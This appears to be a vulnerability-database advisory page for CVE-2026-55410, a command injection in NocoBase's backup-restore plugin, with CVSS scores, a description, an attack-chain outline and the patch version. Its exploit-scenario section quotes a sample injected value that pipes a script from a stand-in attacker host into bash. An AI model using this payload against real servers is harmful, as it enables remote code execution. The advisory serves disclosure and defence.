Skip to main content

NocoBase CVE-2026-55410

| EUVDEUVD-2026-44804 MEDIUM
OS Command Injection (CWE-78)
2026-07-15 GitHub_M
6.7
CVSS 3.1 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
6.7 MEDIUM
AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:H
vuln.today AI
7.2 HIGH

RCE as server process yields full confidentiality loss (C:H not C:L); all other metrics align with the description and PR:H requirement.

3.1 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
High
Availability
High

Lifecycle Timeline

3
Patch available
Jul 15, 2026 - 22:33 EUVD
Source Code Evidence Fetched
Jul 15, 2026 - 21:04 vuln.today
Analysis Generated
Jul 15, 2026 - 21:04 vuln.today

DescriptionCVE.org

NocoBase is an AI-powered no-code/low-code platform for building business applications and enterprise solutions. Prior to 2.1.19, NocoBase @nocobase/plugin-backups restored PostgreSQL backups by interpolating the database.schema value from _metadata.json into shell command strings executed with Node.js child_process.exec(), allowing a backup-management user restoring a crafted backup to execute commands as the NocoBase server process. This vulnerability is fixed in 2.1.19.

AnalysisAI

Command injection in NocoBase's @nocobase/plugin-backups prior to v2.1.19 allows an authenticated backup-management user to execute arbitrary OS commands as the NocoBase server process by restoring a crafted backup archive. The database.schema field from a backup's _metadata.json is interpolated directly into a shell command string passed to Node.js child_process.exec(), a classic CWE-78 pattern that bypasses any sanitization at the shell level. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain or compromise backup management account
Delivery
Craft backup archive with malicious database.schema in _metadata.json
Exploit
Upload crafted archive to NocoBase instance
Execution
Trigger backup restore operation via plugin UI
Persist
Server interpolates schema value into exec() shell string
Impact
Execute arbitrary OS commands as NocoBase server process

Vulnerability AssessmentAI

Exploitation The @nocobase/plugin-backups plugin must be installed and enabled, and the NocoBase instance must use a PostgreSQL backend - the injection occurs specifically in the PostgreSQL backup restore code path and does not affect other database types. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment CVSS 3.1 scores this at 6.7 (Medium) with vector AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:H. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who holds (or has compromised) a NocoBase backup management account crafts a backup archive whose _metadata.json contains a malicious database.schema value such as public; curl http://attacker.example/shell.sh | bash #. The attacker uploads the archive and initiates a restore operation via the NocoBase UI. …
Remediation Upgrade to NocoBase v2.1.19 or later, which resolves this vulnerability by replacing child_process.exec() with child_process.spawn() (discrete argument array form) in the backup plugin's PostgreSQL restore path, confirmed by commit 0e1aba1b7b112ffc841588963f7343c00edd9806. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2024-55591 CRITICAL POC
9.8 Jan 14

FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote

CVE-2014-7205 CRITICAL POC
10.0 Oct 08

Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t

CVE-2025-59528 CRITICAL POC
10.0 Sep 22

Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete

CVE-2017-14849 HIGH POC
7.5 Sep 28

Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc

CVE-2017-5941 CRITICAL POC
9.8 Feb 09

An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner

CVE-2014-3744 HIGH POC
7.5 Oct 23

Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi

CVE-2014-9566 HIGH POC
7.5 Mar 10

Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin

CVE-2013-4660 MEDIUM POC
6.8 Jun 28

The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic

CVE-2015-5688 MEDIUM POC
5.0 Sep 04

Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read

CVE-2026-45321 CRITICAL POC
9.6 May 12

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio

CVE-2014-7192 CRITICAL POC
10.0 Dec 11

Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat

CVE-2013-4450 MEDIUM POC
5.0 Oct 21

The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se

Share

CVE-2026-55410 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy